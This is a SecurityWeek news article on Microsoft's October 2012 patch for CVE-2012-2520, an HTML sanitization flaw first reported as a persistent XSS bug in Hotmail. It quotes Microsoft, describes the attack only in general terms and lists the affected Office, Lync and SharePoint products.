Security Experts:

Recently-Patched HTML Sanitization Flaw Linked to Hotmail XSS Vulnerability

Microsoft Patched XSS Flaw After Google Security Researchers Found It Within Hotmail

The HTML sanitization flaw patched by Microsoft in this month's Patch Tuesday appears to have been discovered originally as a cross-site scripting flaw on Microsoft's Web-based Hotmail email service.

Microsoft patched CVE-2012-2520, which it identified as a HTML sanitization vulnerability affecting several Microsoft Office, Communications, and Server applications, in an "Important" bulletin released as part of October's Patch Tuesday release. HTML strings are not properly handled by the application, giving attackers access to content they are not authorized to read, or the ability to take actions while pretending to be the user.

XSS Vulnerabilities in Hotmail

"An elevation of privilege vulnerability exists in the way that HTML strings are sanitized. An attacker who successfully exploited this vulnerability could perform cross-site scripting attacks and run script in the security context of the logged-on user," Microsoft said in the advisory.

Drew Hintz and Andrew Lyons, two members of Google Security Team reported a persistent XSS flaw in Microsoft Hotmail in May this year. Microsoft acknowledged the two engineers for identifying the flaw in Hotmail in the Security Researcher Acknowledgments page on its Security TechCenter site, and Google identified the persistent XSS flaw found as CVE-2012-2520 on its own research page. Since the vulnerability has an unknown CVSS base score it is not clear how serious the flaw was, but it's worth noting that Microsoft flagged the patch fixing the same flaw in several of its products as "important."

Microsoft did not mention Hotmail at all in the advisory.

"In June 2012 Microsoft became aware of limited, targeted exploits of this issue in Hotmail and addressed the vulnerability immediately; while we addressed the same issue in Microsoft Office and Microsoft Server Software on October 9, we have no evidence of exploitation in the wild,” a Microsoft spokesperson told SecurityWeek.

The targeted attacks relied on a specially crafted HTML email containing JavaScript within CSS code which was sent to the recipient's Hotmail address. Just the act of opening the message—no need to click on a URL— in Hotmail would have given the attacker full control over the recipient's emails and account. Normally, HTML sanitization would have stripped out the JavaScript to render the message harmless. Only users on Internet Explorer 6 or 7 would have been affected by the attacks.

While the flaw was fixed in Hotmail right away, it appeared Microsoft looked for and fixed similar issues in other products, resulting in MS12-066 patch released earlier this week.

Affected software included Microsoft InfoPath 2007 and both 32-bit and 64-bit versions of Microsoft InfoPath 2010, Microsoft Communicator 2007 R2, 32-bit and 64-bit versions of Microsoft Lync 2010, Microsoft Lync 2010 Attendee, 32-bit and 64-bit versions of Microsoft SharePoint Server 2007 and 2010, 32-bit and 64-bit versions of Microsoft Windows SharePoint Services 3.0, Microsoft Groove Server 2010, Microsoft SharePoint Foundation 2010, and Microsoft Office Web Apps 2010.

Microsoft has a common library that it uses across many products to prevent XSS attacks, and it was likely this library which contained the sanitization flaw, Bill Pennington, the chief strategy officer of WhiteHat Security, told SecurityWeek. Even though SharePoint is sold as shrink-wrapped software, it is typically deployed with a Web-based UI, which means the application is vulnerable to XSS attacks. Instant messenger clients often use Internet Explorer to render HTML content. Most administration user interfaces are moving to the Web, opening up an attack surface for XSS issues for more desktop applications, Pennington said.

"Anything that uses a browser or HTML rendering components that executes client-side code is potentially vulnerable to XSS attack," Pennington added.

For the applications patched as part of the Patch Tuesday release, the attacker would have had to convince a user to click on a link that goes to a specially crafted URL or send the user a specially crafted chat message, Microsoft said in the advisory.

view counter
Fahmida Y. Rashid is a Senior Contributing Writer for SecurityWeek. She has experience writing and reviewing security, core Internet infrastructure, open source, networking, and storage. Before setting out her journalism shingle, she spent nine years as a help-desk technician, software and Web application developer, network administrator, and technology consultant.